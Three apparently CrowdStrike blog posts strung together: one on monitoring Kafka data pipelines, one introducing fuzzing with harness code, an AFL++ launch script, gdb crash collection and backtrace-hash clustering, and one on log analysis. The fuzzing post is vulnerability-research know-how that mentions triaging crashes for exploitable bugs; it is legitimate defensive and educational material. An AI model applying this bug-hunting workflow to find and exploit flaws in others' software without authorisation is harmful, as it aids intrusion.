Virtually every aspect of a modern business depends on having a reliable, secure, real-time, high-quality data stream. So how do organizations design, build and maintain a data processing pipeline that delivers? 

In creating a comprehensive monitoring strategy for CrowdStrike’s data processing pipelines, we found it helpful to consider four main attributes: observability, operability, availability and quality.

As illustrated above, we’re modeling these attributes along two axes — complexity of implementation and engineer experience — which enables us to classify these attributes into four quadrants.

This model makes it possible to weigh the challenges involved in building a comprehensive monitoring system against the iterative approach engineers can take to realize benefits while advancing their monitoring strategy.

For example, in the lower left quadrant, we start with basic observability, which is relatively easy to address and is helpful in terms of creating a positive developer experience. As we move along the X axis and up the Y axis, measuring these attributes becomes challenging and might need a significant development effort.

In this post, we explore each of the four quadrants, starting with observability, which focuses on inferring the operational state of our data streaming infrastructure from the knowledge of external outputs. We will then explore availability and discuss how we make sure that the data keeps flowing end-to-end in our streaming data infrastructure systems without interruption. Next, we will discuss simple and repeatable processes to deal with issues, along with the auto-remediations we created to help improve operability. Finally, we will explore how we improved the efficiency of our processing pipelines and established key indicators and enforceable service level agreements (SLAs) for quality.


Apache Kafka is a distributed, replicated messaging service platform that serves as a highly scalable, reliable and fast data ingestion and streaming tool. At CrowdStrike, we use Apache Kafka as the main component of our near real-time data processing systems to handle over a trillion events per day.

Ensuring Kafka Cluster Is Operational

When we create a new Kafka cluster, we must establish that it is reachable and operational. We can check this with a simple external service that constantly sends heartbeat messages to the Kafka cluster and, at the same time, consumes those messages. By verifying that the messages it produces match the messages it consumes, we gain confidence that the Kafka cluster is truly operational.
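In outline, the heartbeat check might look like this; the Producer and Consumer interfaces are assumptions standing in for a real Kafka client, and a channel-backed fake lets the sketch run standalone:

```go
package main

import (
	"fmt"
	"time"
)

// Producer and Consumer are assumed stand-ins for a real Kafka client.
type Producer interface{ Send(msg string) error }
type Consumer interface {
	Receive(timeout time.Duration) (string, error)
}

// heartbeat sends a uniquely identifiable message through the cluster and
// verifies the same message comes back out within the timeout.
func heartbeat(p Producer, c Consumer) error {
	msg := fmt.Sprintf("heartbeat-%d", time.Now().UnixNano())
	if err := p.Send(msg); err != nil {
		return fmt.Errorf("produce failed: %w", err)
	}
	got, err := c.Receive(5 * time.Second)
	if err != nil {
		return fmt.Errorf("consume failed: %w", err)
	}
	if got != msg {
		return fmt.Errorf("mismatch: sent %q, got %q", msg, got)
	}
	return nil // the cluster is reachable and moving data end to end
}

// chanBroker is an in-memory fake so the sketch runs standalone.
type chanBroker chan string

func (b chanBroker) Send(msg string) error { b <- msg; return nil }
func (b chanBroker) Receive(d time.Duration) (string, error) {
	select {
	case m := <-b:
		return m, nil
	case <-time.After(d):
		return "", fmt.Errorf("timed out after %v", d)
	}
}

func main() {
	b := make(chanBroker, 1)
	fmt.Println(heartbeat(b, b)) // <nil>
}
```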

Once we establish that the cluster is operational, we check on other key metrics, such as the consumer group lag. 

Kafka Lag Monitoring

One of the key metrics to monitor when working with Kafka, as a data pipeline or a streaming platform, is consumer group lag.

When an application consumes messages from Kafka, it commits its offset in order to keep its position in the partition. When a consumer gets stuck for any reason — for example, an error, rebalance or even a complete stop — it can resume from the last committed offset and continue from the same point in time.

Therefore, lag is the delta between the last committed offset and the last produced offset. In other words, lag indicates how far behind your application is in processing up-to-date information. Also, Kafka persistence is based on retention, meaning that if your lag persists long enough for unconsumed messages to age out of the retention window, you will lose data. The goal is to keep lag to a minimum.
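As a concrete illustration of that definition (a sketch, not CrowdStrike's implementation), total consumer group lag can be computed per partition as the newest produced offset minus the committed offset:

```go
package main

import "fmt"

// totalLag sums, across partitions, the delta between the newest produced
// offset and the consumer group's last committed offset.
func totalLag(newest, committed map[int32]int64) int64 {
	var total int64
	for partition, head := range newest {
		total += head - committed[partition]
	}
	return total
}

func main() {
	newest := map[int32]int64{0: 1050, 1: 2000}
	committed := map[int32]int64{0: 1000, 1: 1990}
	fmt.Println(totalLag(newest, committed)) // 60
}
```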

We use Burrow for monitoring Kafka consumer group lag. Burrow is an open source monitoring solution for Kafka that provides consumer lag checking as a service. It monitors committed offsets for all consumers and calculates the status of those consumers on demand. The metrics are exposed via an HTTP endpoint.

It also has configurable notifiers that can send status updates via email or HTTP if a partition status has changed based on predefined lag evaluation rules.

Burrow exposes both status and consumer group lag information in a structured format for a given consumer group across all of the partitions of the topic from which it is consuming. However, there is one drawback with this system: It will only present us with a snapshot of consumer group lag. Having the ability to look back in time and analyze historical trends in this data for a given consumer group is important for us.

To address this, we built a system called Kafka monitor. Kafka monitor fetches these metrics that are exposed by Burrow and stores them in a time series database. This enabled us to analyze historical trends and even perform velocity calculations like mean recovery time from lag for a Kafka consumer, for example.

In the next section, we explore how we implemented auto-remediations, using the consumer group status information from Burrow, to improve the availability and operability in our data infrastructure.

Availability and Operability

Kafka Cluster High Availability 

Initially, our organization relied on one very large cluster in Kafka to process incoming events. Over time, we expanded that cluster to manage our truly enormous data stream. 

However, as our company continues to grow, scaling our clusters vertically has become both problematic and impractical. Our recent blog post, Sharding Kafka for Increased Scale and Reliability, explores this issue and our solution in greater detail. 

Improved Availability and Operability for Stream Processing Jobs

For our stateless streaming jobs, we noticed that by simply relaunching these jobs upon getting stuck, we have a good chance of getting that consumer out of the stuck state. However, it is not practical at our scale to relaunch these jobs manually. So we created a tool called AlertResponder. As the name implies, it will automatically relaunch a stateless job upon getting the first consumer stuck alert.

Of course, we’ll still investigate the root cause afterward. Also, when the relaunch does not fix the problem or if it fails to relaunch for some reason, AlertResponder will then escalate this to an on-call engineer by paging them.

The second useful automation that we derive from our consumer lag monitoring is streaming jobs autoscaling. For most of our streams, traffic fluctuates on a daily basis. It is very inefficient to use a fixed capacity for all streaming jobs. During the peak hours, after the traffic exceeds a certain threshold, the consumer lag will increase dramatically. The direct impact of this is that the customers will see increased processing delays and latency at peak hours.

This is where auto-scaling helps. We use two auto-scaling strategies:

  1. Scheduled scaling: For stream processing jobs for which we are able to reliably predict the traffic patterns over the course of a day, we implemented a scheduled auto scaling strategy. With this strategy, we scale the consumer groups to a predetermined capacity at a known point in time to match the traffic patterns.
  2. Scaling based on consumer lag: For jobs running on our Kubernetes platform, we use KEDA (Kubernetes-based Event Driven Autoscaler) to scale the consumer groups. With KEDA, you can drive the scaling of any container in Kubernetes based on the number of events needing to be processed. We use KEDA’s Prometheus scaler. Using the consumer lag metrics that are available in Prometheus, KEDA calculates the number of containers needed for the streaming jobs and works with the Horizontal Pod Autoscaler (HPA) to scale a deployment accordingly.

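A KEDA ScaledObject for the second strategy might look roughly like this (the names, Prometheus address and lag query are illustrative assumptions, not our production configuration):

```yaml
apiVersion: keda.sh/v1alpha1
kind: ScaledObject
metadata:
  name: stream-processor          # hypothetical job name
spec:
  scaleTargetRef:
    name: stream-processor        # the Deployment running the consumers
  minReplicaCount: 2
  maxReplicaCount: 50
  triggers:
    - type: prometheus
      metadata:
        serverAddress: http://prometheus.monitoring:9090   # assumed address
        query: sum(kafka_consumergroup_lag{consumergroup="stream-processor"})
        threshold: "5000"         # target lag per replica
```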

When we talk about the quality of streaming data infrastructure, we are essentially considering two things: 

  1. Efficiency
  2. Conformance to service level agreements (SLAs)

Improving Efficiency Through Redistribution

When lag is uniform across a topic’s partitions, that is typically addressed by horizontal scaling of consumers as discussed above; however, when lag is not evenly distributed across a topic, scaling is much less effective.

Unfortunately, there is no out-of-the box way to address the issue of lag hotspots on certain partitions of a topic within Kafka. In our recent post, Addressing Uneven Partition Lag in Kafka, we explore our solution and how we can coordinate it across our complex ecosystem of more than 300 microservices. 

SLA-based Monitoring

It is almost impossible to measure the quality of a service correctly, let alone well, without understanding which behaviors really matter for that service and how to measure and evaluate those behaviors.

Service level indicators (SLIs), like data loss rate and end-to-end latency, are useful to measure the quality of our streaming data infrastructure. 

As an example, the diagram below shows how we track end-to-end latency through external observation (black box analysis).

We deploy monitors that submit sample input data to the data pipeline and observe the outputs from the pipeline. These monitors submit end-to-end processing latency metrics that, combined with our alerting framework, will be used to emit SLA-based alerts.
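Such a monitor can be sketched as follows; the Pipeline interface is an assumed stand-in for submitting a sample event and observing the pipeline's output:

```go
package main

import (
	"fmt"
	"time"
)

// Pipeline is an assumed stand-in: Submit injects a tagged sample event at
// the pipeline's input, and Await blocks until it appears at the output.
type Pipeline interface {
	Submit(id string) error
	Await(id string, timeout time.Duration) error
}

// probe measures end-to-end latency purely by external observation.
func probe(p Pipeline) (time.Duration, error) {
	id := fmt.Sprintf("probe-%d", time.Now().UnixNano())
	start := time.Now()
	if err := p.Submit(id); err != nil {
		return 0, err
	}
	if err := p.Await(id, 30*time.Second); err != nil {
		return 0, err // a missing output also feeds a data-loss-rate SLI
	}
	// Emitted as a metric, this duration feeds the SLA-based alerting.
	return time.Since(start), nil
}

// fakePipe lets the sketch run standalone.
type fakePipe struct{}

func (fakePipe) Submit(id string) error                 { return nil }
func (fakePipe) Await(id string, _ time.Duration) error { return nil }

func main() {
	d, err := probe(fakePipe{})
	fmt.Println(d >= 0, err) // true <nil>
}
```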


These four attributes — observability, availability, operability and quality — are each important in their own right for designing, working in and maintaining the streaming data infrastructure at scale. As discussed in our post, these attributes have a symbiotic relationship. The four-quadrant model not only exposes this relationship but also offers an intuitive mental model that helps us build a comprehensive monitoring solution for streaming data applications that operate at scale.

Have ideas to share about how you create a high-functioning data processing pipeline? Share your thoughts with @CrowdStrike via social media.

✇ CrowdStrike

A Foray into Fuzzing

By: Max Julian Hofmann

One useful method in a security researcher’s toolbox for discovering new bugs in software is called “fuzz testing,” or just “fuzzing.” Fuzzing is an automatic software testing approach where the software that is to be tested (the target) is automatically fed with input data and its behavior during execution is analyzed and checked for any errors. For the CrowdStrike Intelligence Advanced Research Team, fuzzing is one of our crucial tools to perform bug hunting.

In fuzzing, a fuzzing engine generates suitable inputs, passes them to the target and monitors its execution. The goal is to find an input for which the target behaves undesirably, such as crashing (e.g., with a segmentation fault). Figure 1 shows the main steps of a fuzzing run.

Figure 1. Steps a fuzzing engine performs during execution

Some of the most popular fuzzing engines are American Fuzzy Lop (AFL) and its successor AFL++; libFuzzer; and Honggfuzz. They are known not only for being very efficient at fuzzing but also for their remarkable trophy cases.

Fuzzing can be quite successful because of its minimal overhead compared to other dynamic testing methods — in both compilation and preparation, and also in execution. It typically requires only lightweight instrumentation (e.g., a fixed number of instructions per basic block), and can therefore achieve close to native execution speed. One important disadvantage to consider is that the fuzzing engine usually tests only a fraction of all possible inputs, and bugs may remain undetected.

Automatically generating inputs that trigger some kind of a bug in a reasonable amount of time is therefore one of the main challenges of fuzzing. On one hand, the number of inputs of a certain length is typically very large. On the other hand, testing all possible inputs is usually not necessary or even desirable, especially if the data must follow a certain format to actually reach relevant code paths. 

One simple example is a target that considers an input to be valid if and only if it starts with a hard-coded string, aka a magic string. Therefore, many fuzzing engines expect a small set of valid inputs and then start deriving new inputs with different mutation strategies (e.g., flipping bits, or adding and removing arbitrary data). For some engines, this mutation is driven by instrumenting the target to measure the execution path that a certain input has triggered. The general assumption is that a change in the input that triggers a new execution path is more likely to discover crashes than a change that exercises a code path that was previously observed.

During fuzzing, inputs that crash or hang the fuzzing target indicate that a bug was triggered. Such inputs (or samples) are collected for further analysis. Provided the target behaves deterministically, any input can be easily passed to the target again to try to reproduce the result observed during fuzzing.

It is common for a fuzzing run to generate many samples that trigger the same bug in the target. For example, an input of 160 characters might trigger the same buffer overflow in the target as an input with 162 characters. To be able to handle the many potential samples generated during a fuzzing run and not have to analyze each individually, good tooling is crucial to triage them. While some targets require custom tooling, we found several strategies to be generally applicable, and we will introduce a few of them next.



Modern fuzzing approaches mutate those inputs that have shown particular promise of leading to new behavior. For example, coverage-guided fuzzing engines preferentially mutate those inputs that lead to undiscovered execution paths within the target. To be able to detect new execution paths, the fuzzing engine tries to measure the code coverage of a specific execution run. To do so, instrumentation is usually compiled into the target. 

Fuzzing tools usually provide their own compilation toolchains as wrappers around common compilers (e.g., gcc or clang) to inject instrumentation at compile time. It should be noted that some fuzzing engines are also capable of fuzzing non-instrumented binaries — one popular method for fuzzing closed-source binaries is to use QEMU’s dynamic binary translation to instrument them transparently, without recompilation. For the rest of this blog post, though, we’ll assume that we have access to the software’s source code and are allowed and able to modify and compile it.
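To make the idea of coverage measurement concrete, here is a toy sketch of our own (not how AFL++ or Honggfuzz implement it) that records which lines a given input exercises, using Python’s sys.settrace hook in place of compile-time instrumentation:

```python
import sys

def trace_lines(func, *args):
    """Run func(*args) and return the set of (function name, line) pairs executed."""
    coverage = set()

    def tracer(frame, event, arg):
        if event == "line":
            coverage.add((frame.f_code.co_name, frame.f_lineno))
        return tracer

    sys.settrace(tracer)
    try:
        func(*args)
    finally:
        sys.settrace(None)
    return coverage

def target(data):
    # hypothetical target guarded by a magic string
    if data.startswith(b"MAGIC"):
        return len(data)   # path behind the magic-string check
    return -1              # common path for all other inputs

cov_valid = trace_lines(target, b"MAGIC123")
cov_invalid = trace_lines(target, b"junk")
new_paths = cov_valid - cov_invalid   # coverage only the valid input reached
```

An engine would treat a non-empty `new_paths` as a signal that the input is worth keeping in the corpus and mutating further.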

Hunting for security vulnerabilities is important for estimating the potential risks and exploitability of a piece of software. However, only some types of vulnerabilities can be detected by a generic fuzzing engine. While a null pointer dereference will normally crash the fuzzing target and thus produce a report from the fuzzing engine, a logic flaw where a function returns a type-correct but wrong result is likely to go undetected. 

AFL++ and Honggfuzz, for example, report those inputs for which the execution of the fuzzing target was terminated with a signal (e.g., SIGSEGV or SIGABRT). A generic fuzzing engine has no way of knowing whether a function such as int isdigit(int c) behaved correctly when it returned 1 for a given character c. In addition, not every memory issue leads to a crash. Unless it causes an access violation, an out-of-bounds read operation might not be detected at all, and an out-of-bounds write operation may crash the fuzzing target only if the data that was overwritten is subsequently used in some way (e.g., a return address on the stack or an allocated heap memory segment).

There are two general solutions to address these issues. For one, Address Sanitizer (ASan) can be used to find and report memory errors that would not normally cause a program to crash. If ASAN_OPTIONS="abort_on_error=1" is set in the environment, ASan terminates the program with signal SIGABRT when an error is detected. In addition, small function wrappers can be implemented to introduce application-specific checks or other optimizations, as shown next.

The Harness

Fuzzing a library or a program typically requires researchers to write a bit of wrapper code that implements an entry point for the fuzzer, potentially executes some setup code, and passes the fuzzing input to the function that is to be fuzzed. This wrapper code is typically called a harness. In addition to passing along the fuzzer input, a harness can also provide several other features.

First, a harness can normalize the input from the fuzzer to the target. Especially when targeting a function, wrapping it into an executable that presents a standardized interface to the fuzzing engine is necessary. This type of wrapper sometimes needs to do more than simply passing the input to the target function, because fuzzing engines in general would not be aware of any requirements or format that the target expects. For example, when targeting a function such as

int some_api(char *data, size_t data_length);

which expects a string and the length of this string as arguments, a wrapper such as the following can be used to make sure that the data generated by the fuzzing engine is passed to the function in the proper format:

int fuzz_some_api(char *fuzz_data)
{
        return some_api(fuzz_data, strlen(fuzz_data));
}

Other types of wrappers can aid the fuzzer by ignoring certain inputs that are known to cause false positives, for example because the target detects them as erroneous and reacts with a (not security-relevant) crash. 

For example, having a target function char *encode(char *data) that is known to safely crash if the input string contains certain characters, a wrapper such as the following could be used to avoid such false positive reports:

char *fuzz_encode(char *fuzz_data)
{
        for (char *ptr = fuzz_data; *ptr != '\0'; ptr++) {
            if (!fuzz_is_allowed_character(*ptr))
                return NULL;
        }

        return encode(fuzz_data);
}

Conversely, a wrapper can also be used to detect and signal unexpected behavior, even if the fuzzing target does not crash. For example, given two functions

  1. char *encode(char *data);
  2. char *decode(char *data);

(where decode() is expected to implement the reverse function of encode(), and vice versa) a wrapper function can ensure that for any generated input, the string returned by decode(encode(fuzz_data)) is equal to the input fuzz_data. The wrapper function, and entry point for the fuzzer, might implement a routine as follows:

void fuzz_functions(char *fuzz_data)
{
        if (strcmp(decode(encode(fuzz_data)), fuzz_data) != 0)
            trigger_crash(); // force a crash, e.g. via *((int *) 0) = -1;
}

In summary, wrapping the fuzzing target can often reduce the number of false positives by a considerable amount. When implementing wrappers, we found it to be very useful to integrate the wrapping code into the original codebase using #ifdef statements as shown below:

int main(int argc, char **argv)
{
    #ifdef FUZZING
        return func(get_fuzz_data());
    #else
        // original codebase:
        data = get_data_via_options(argc, argv);
        return func(data);
    #endif
}

Utilizing All Cores

Since fuzzing is resource-intensive, it would be ideal to utilize all processor cores that are available in a modern multi-core system. While Honggfuzz is a multi-process and multi-threaded fuzzing engine out of the box, AFL++ needs manual setup to do so.

To fuzz in parallel using AFL++, the fuzzing is started with one “master instance” (flagged with -M), and all other instances will be created as “secondary instances” (flagged with -S). The following excerpt is part of a script that can be used to spawn multiple instances of afl-fuzz, each one inside a screen session to be able to log out of the fuzzing host without interrupting the instances:

for i in $(seq -w 1 ${NUM_PROCS}); do
        if [ "$i" -eq "1" ]; then
            PARAM="-M fuzzer${i}"
        else
            PARAM="-S fuzzer${i}"
        fi

        CMD="afl-fuzz -i ${DIR_IN} -o ${DIR_OUT} ${PARAM} ${BINARY}"

        echo "[+] starting fuzzing instance ${i} (parameter ${PARAM})..."
        screen -dmS "fuzzer-${i}" ${CMD}
done

Crash Triage

After running for a while, the fuzzer will ideally have generated a number of inputs (samples) that crashed the target during fuzzing. We now aim to automatically aggregate this set of samples and enrich each sample and the corresponding potential crash with information to drive any further analysis. 

One of our strategies is to group (cluster) the samples with respect to the behavior of the fuzzing target during execution. Since the resulting clusters then represent different behavior of the fuzzing target, they are easier to triage for (exploitable) bugs. This clustering strategy requires information about the crash and the code path that led to it, which can be collected automatically, using debuggers, for example.

Other information that can be automatically collected is whether a crash is deterministically reproducible, and whether the build configuration (affecting, for example, function addresses or variable order) or the runtime environment (e.g., environment variables or network properties) has an impact on whether the target crashes on a particular sample. 

Given a sample from the fuzzing run, we can replay that input against the target compiled with different configurations (e.g., both with and without the fuzzer’s instrumentation, with different build-time options, or with and without ASan) and see whether the executions crash. The idea is to have different binaries with different configurations to capture circumstances of a crash with respect to a sample that was generated during a fuzzing run. 
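Such a replay step can be scripted in a few lines; the following sketch is our own illustration (the variant names and the crash criterion are not tied to a specific tool):

```python
import subprocess

def replay(binary_variants, sample_path, timeout=10):
    """Feed one sample to several builds of the target and record crashes.

    binary_variants maps a label (e.g. "asan", "plain") to an argv list.
    A negative return code means the process was terminated by a signal
    (e.g., -11 for SIGSEGV), which we treat as a crash.
    """
    results = {}
    for name, argv in binary_variants.items():
        try:
            proc = subprocess.run(argv + [sample_path],
                                  capture_output=True, timeout=timeout)
            results[name] = {"crashed": proc.returncode < 0,
                             "returncode": proc.returncode}
        except subprocess.TimeoutExpired:
            results[name] = {"crashed": False, "returncode": None,
                             "hang": True}
    return results
```

Comparing the per-variant results for one sample then directly answers questions such as “does this input crash only the ASan build?”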

For example, if only the instrumented version crashes, then the bug is potentially in the fuzzing-specific code and therefore a false positive. Another example is a sample generated by a fuzzing run on a target with ASan support, where a crash cannot be reproduced with a non-ASan version. In this case, there might be a bug that does not crash the target but could potentially be used to engineer an exploit (e.g., out-of-bound read access to leak sensitive information). 

Collecting all of this information will help us better understand why the samples collected by the fuzzer crash the target, under which circumstances, and whether they may have triggered an exploitable bug. Good strategies and tooling are essential to reduce the required amount of manual analysis.

Sample Collection

Since the different fuzzing engines save samples in different ways, another simple but necessary post-processing step to implement is sample collection. AFL++ and Honggfuzz default to storing each sample in its own file and using the filename to save information about the termination signal, the program counter, a stack signature, and the address and disassembled instruction at which the fault occurred. 

Unfortunately, the two fuzzers use different formats out of the box, so the first step in our post-processing pipeline is to collect and move all samples to a shared folder, extract and store the information from the filenames, and then rename the samples to a standard format. Renaming samples to a hash of their contents has worked well for us, because it allows quick and easy merging of samples from different fuzzing runs.
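A sketch of such a collection step (the directory layout and the choice of MD5 are our own, hypothetical conventions):

```python
import hashlib
import os

def content_hash(path: str) -> str:
    """Return the MD5 hex digest of a file's contents."""
    with open(path, "rb") as f:
        return hashlib.md5(f.read()).hexdigest()

def collect_samples(src_dir: str, dst_dir: str):
    """Move every sample into dst_dir, named by its content hash.

    Identical samples from different fuzzing runs collapse into one file.
    """
    os.makedirs(dst_dir, exist_ok=True)
    for name in os.listdir(src_dir):
        src = os.path.join(src_dir, name)
        if os.path.isfile(src):
            os.replace(src, os.path.join(dst_dir, content_hash(src)))
```

Because identical inputs map to identical filenames, running this over the output directories of several fuzzing runs deduplicates the samples as a side effect.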

Information Collection Using GDB

For each sample, we automatically collect information as already indicated. One of the building blocks is an analysis module that uses gdb to collect various information about the crash of a target on a given sample. For the sake of simplicity, we’ll assume that the target expects data either from STDIN or as a command line argument and is unaffected by other vectors that could affect the execution of a binary (e.g., network, environment variables, file system properties). The module invokes gdb as follows:

/usr/bin/gdb -q -nx $binary

The -nx flag is used to avoid loading a gdbinit file, while the -q flag is used to stop gdb printing its version string. After invoking gdb, the following gdb commands are executed automatically:

(gdb) set width unlimited
(gdb) run {run_payload}
(gdb) backtrace -frame-info short-location

The first command prevents gdb from breaking long lines, e.g., when printing backtraces. The second command executes the fuzzing target, feeding it either the path to the sample or the actual sample content. The third command generates the backtrace. If the execution of the binary finishes without a crash, or times out, the evaluation is stopped and no backtrace is generated.

A backtrace is, in general, a summary of the program’s path to the current point in execution. It consists of stack frames, where each stack frame relates to one nested function call. For example, if a function f() calls a function g(), g() in turn calls a function h(), and a backtrace is generated inside h(), that backtrace might look as follows:
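With hypothetical addresses (and no debug symbols available), the innermost frame is shown first:

#0  0x0000555555555190 in h ()
#1  0x00005555555551b5 in g ()
#2  0x00005555555551d0 in f ()
#3  0x00005555555551f2 in main ()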

In summary, by executing the binary once on each sample, gdb will tell us whether the binary crashed at all, and if it did, gdb will yield the signal that terminated the process, as well as a backtrace. The backtrace will provide the names of invoked functions, their addresses, variable states and additional debugging information. The output for an exemplary sample looks as follows:
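The following transcript is reconstructed from the database entry shown further below and is meant only to illustrate the shape of that output:

Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7f09592 in __memmove_avx_unaligned_erms ()
(gdb) backtrace -frame-info short-location
#0  0x00007ffff7f09592 in __memmove_avx_unaligned_erms ()
#1  0x00007ffff7fb3524 in ReadFromRFBServer ()
#2  0x00007ffff7fae7da in HandleTRLE24 ()
#3  0x00007ffff7f9c9ba in HandleRFBServerMessage ()
#4  0x0000555555555762 in spin_fuzzing ()
#5  0x00005555555558e5 in main ()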

This information is then parsed, stored in a database and subsequently used to cluster all of the samples in order to reduce the overhead of identifying interesting bugs.


Clustering
After gathering information about all of our samples and adding them to a database, the next step is to try and sort the samples into clusters. Obviously, there are many possible approaches to do that. One method that works very well for us, while being exceedingly simple, is based on hashing the list of addresses of the backtrace. The following source code excerpt shows this approach:

import hashlib

def compute_clusterhash(backtrace):
        bt_addresses = [frame["addr"] for frame in backtrace]
        return hashlib.md5('.'.join(bt_addresses).encode()).hexdigest()

For each sample, there is an entry in a database that looks as follows:

        "sample": "e5f3438438270583ff09cd84790ee46e",
        "crash": true,
        "signal": "SIGSEGV",
        "signal_description": "Segmentation fault",
        "backtrace": [
                "addr": "0x00007ffff7f09592",
                "func": "__memmove_avx_unaligned_erms", [...]
                "addr": "0x00007ffff7fb3524",
                "func": "ReadFromRFBServer", [...]
                "addr": "0x00007ffff7fae7da",
                "func": "HandleTRLE24", [...]
                "addr": "0x00007ffff7f9c9ba",
                "func": "HandleRFBServerMessage", [...]
                "addr": "0x0000555555555762",
                "func": "spin_fuzzing", [...]
                "addr": "0x00005555555558e5",
                "func": "main", [...]

This information is now transformed into a hash using compute_clusterhash(), as shown below:

>>> compute_clusterhash(example["backtrace"])

We can now cluster our samples by these hashes, hoping samples that trigger different bugs yield different hashes, and samples that trigger the same bug yield the same hash. The next step would be to examine the different clusters to better understand the underlying bugs and learn how to trigger and potentially exploit them. In the best case, just one or only very few samples from each cluster would need to be reviewed.
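Building the clusters from such database entries can then be a few lines of Python. The record shape below mirrors the example entry shown earlier, but the grouping helper itself is our own sketch:

```python
import hashlib
from collections import defaultdict

def compute_clusterhash(backtrace):
    bt_addresses = [frame["addr"] for frame in backtrace]
    return hashlib.md5('.'.join(bt_addresses).encode()).hexdigest()

def cluster_samples(samples):
    """Group crashing samples by the hash of their backtrace addresses."""
    clusters = defaultdict(list)
    for s in samples:
        if s.get("crash"):
            clusters[compute_clusterhash(s["backtrace"])].append(s["sample"])
    return clusters

# two samples share a backtrace, the third crashes somewhere else
samples = [
    {"sample": "a1", "crash": True,
     "backtrace": [{"addr": "0x1"}, {"addr": "0x2"}]},
    {"sample": "b2", "crash": True,
     "backtrace": [{"addr": "0x1"}, {"addr": "0x2"}]},
    {"sample": "c3", "crash": True,
     "backtrace": [{"addr": "0x3"}]},
]
clusters = cluster_samples(samples)
```

Each key of `clusters` then stands for one (presumed) distinct bug, and reviewing one sample per key is usually enough for a first pass.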

In our experience, deriving clusters from the backtrace — generated at the point where the crash occurs — is more useful than considering the full execution path that led to the crash, because software is usually complex enough that different execution paths lead to the same position in code. However, if the analysis reveals that the same bug is reached through different backtraces for a certain target, the described method can be adapted to trim the backtrace to a number of most recent frames during clustering, under the assumption that code closer to the crash is more relevant than code that was executed earlier in the program.


Conclusion
Fuzzing is a well-established technique for discovering new vulnerabilities in software. With this blog, we hope to give you an overview of what is required to successfully fuzz a target, from implementing a harness, to gathering crash information, to using this information for clustering inputs and corresponding crashes for further analysis.


Everything You Need To Know About Log Analysis

By: Humio Staff

This blog was originally published Sept. 30, 2021 on humio.com. Humio is a CrowdStrike Company.

What Is Log Analysis?

Log analysis is the process of reviewing computer-generated event logs to proactively identify bugs, security threats, factors affecting system or application performance, or other risks. Log analysis can also be used more broadly to ensure compliance with regulations or review user behavior.

A log is a comprehensive file that captures activity within the operating system, software applications or devices. Logs automatically document any information designated by the system administrators, including: messages, error reports, file requests, file transfers and sign-in/out requests. The activity is also time-stamped, which helps IT professionals and developers establish an audit trail in the event of a system failure, breach or other outlying event.

Why Is Log Analysis Important?

In some cases, log analysis is critical for compliance since organizations must adhere to specific regulations that dictate how data is archived and analyzed. It can also help predict the useful lifespan of hardware and software. In addition, log analysis can help IT teams amplify four key factors that help deliver greater business value and customer-centric solutions: agility, efficiency, resilience and customer value.

Log analysis can unlock many additional benefits for the business. These include:

  • Improved troubleshooting. Organizations that regularly review and analyze logs are typically able to identify errors more quickly. With an advanced log analysis tool, the business may even be able to pinpoint problems before they occur, which greatly reduces the time and cost of remediation. Logs also help the log analyzer review the events leading up to the error, which may make the issue easier to troubleshoot and prevent in the future.
  • Enhanced cybersecurity. Effective log analysis dramatically strengthens the organization’s cybersecurity capabilities. Regular review and analysis of logs helps organizations more quickly detect anomalies, contain threats and prioritize responses.
  • Improved customer experience. Log analysis helps businesses ensure that all customer-facing applications and tools are fully operational and secure. The consistent and proactive review of log events helps the organization quickly identify disruptions or even prevent such issues — improving satisfaction and reducing turnover.
  • Agility. Organizations can predict the useful life span of hardware and software and help businesses prepare for scale and agility, thus providing a competitive edge in the marketplace.

How Is Log Analysis Performed?

Log analysis is typically done within a log management system, a software solution that gathers, sorts and stores log data and event logs from a variety of sources.

Log management platforms allow the IT team and security professionals to establish a single point from which to access all relevant endpoint, network and application data. Typically, logs are searchable, which means the log analyzer can easily access the data they need to make decisions about network health, resource allocation or security. Traditional log management uses indexing, which can slow down search and analysis. Modern log management uses index-free search; it is less expensive, faster and can reduce required disk space by a factor of 50-100.

Log analysis typically includes:

Ingestion: Installing a log collector to gather data from a variety of sources, including the OS, applications, servers, hosts and each endpoint, across the network infrastructure.

Centralization: Aggregating all log data in a single location as well as a standardized format regardless of the log source. This helps simplify the analysis process and increase the speed at which data can be applied throughout the business.

Search and analysis: Leveraging a combination of AI/ML-enabled log analytics and human resources to review and analyze known errors, suspicious activity or other anomalies within the system. Given the vast amount of data available within the log, it is important to automate as much of the log analysis process as possible. It is also recommended to create a graphical representation of data, through knowledge graphing or other techniques, to help the IT team visualize each log entry, its timing and interrelations.

Monitoring and alerts: The log management system should leverage advanced log analytics to continuously monitor the log for any log event that requires attention or human intervention. The system can be programmed to automatically issue alerts when certain events take place or certain conditions are or are not met.

Reporting: Finally, the LMS should provide a streamlined report of all events as well as an intuitive interface that the log analyzer can leverage to get additional information from the log.

The Limitations of Indexing

Many log management software solutions rely on indexing to organize the log. While this was considered an effective solution in the past, indexing can be a very computationally expensive activity, causing latency between data entering a system and that data being included in search results and visualizations. As the speed at which data is produced and consumed increases, this is a limitation that could have devastating consequences for organizations that need real-time insight into system performance and events.

Further, with index-based solutions, search patterns are also defined based on what was indexed. This is another critical limitation, particularly when an investigation is needed and the available data can’t be searched because it wasn’t properly indexed.

Leading solutions offer free-text search, which allows the IT team to search any field in any log. This capability helps to improve the speed at which the team can work without compromising performance.

Log Analysis Methods

Given the massive amount of data being created in today’s digital world, it has become impossible for IT professionals to manually manage and analyze logs across a sprawling tech environment. As such, they require an advanced log management system and techniques that automate key aspects of the data collection, formatting and analysis processes.

These techniques include:

  • Normalization. Normalization is a data management technique that ensures all data and attributes, such as IP addresses and timestamps, within the transaction log are formatted in a consistent way.
  • Pattern recognition. Pattern recognition refers to filtering events based on a pattern book in order to separate routine events from anomalies.
  • Classification and tagging. Classification and tagging is the process of tagging events with key words and classifying them by group so that similar or related events can be reviewed together.
  • Correlation analysis. Correlation analysis is a technique that gathers log data from several different sources and reviews the information as a whole using log analytics.
  • Artificial ignorance. Artificial ignorance refers to the active disregard for entries that are not material to system health or performance.

Log Analysis Use Case Examples

Effective log analysis has use cases across the enterprise. Some of the most useful applications include:

  • Development and DevOps. Log analysis tools and log analysis software are invaluable to DevOps teams, as they require comprehensive observability to see and address problems across the infrastructure. Further, because developers are creating code for increasingly-complex environments, they need to understand how code impacts the production environment after deployment. An advanced log analysis tool will help developers and DevOps organizations easily aggregate data from any source to gain instant visibility into their entire system. This allows the team to identify and address concerns, as well as seek deeper information.
